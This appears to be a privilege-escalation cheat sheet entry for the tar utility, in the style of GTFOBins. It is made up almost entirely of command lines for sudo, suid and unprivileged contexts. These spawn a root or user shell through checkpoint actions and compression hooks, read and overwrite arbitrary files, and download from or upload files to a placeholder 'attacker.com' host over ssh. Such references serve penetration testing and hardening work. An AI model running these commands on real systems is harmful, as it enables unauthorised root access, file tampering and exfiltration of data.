tar
Download
Context: sudo, suid, unprivileged
tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/sshFile Read
Context: sudo, suid, unprivileged
tar cf /dev/stdout /path/to/input-file -I 'tar xO'File Write
Context: sudo, suid, unprivileged
echo DATA >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@Shell
Context: sudo, suid, unprivileged
tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shContext: sudo, suid, unprivileged
tar xf /dev/null -I '/bin/sh -c "/bin/sh 0<&2 1>&2"'Context: sudo, suid, unprivileged
echo '/bin/sh 0<&1' >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar xf /path/to/temp-file.tar --to-command /bin/shUpload
Context: sudo, suid, unprivileged
tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh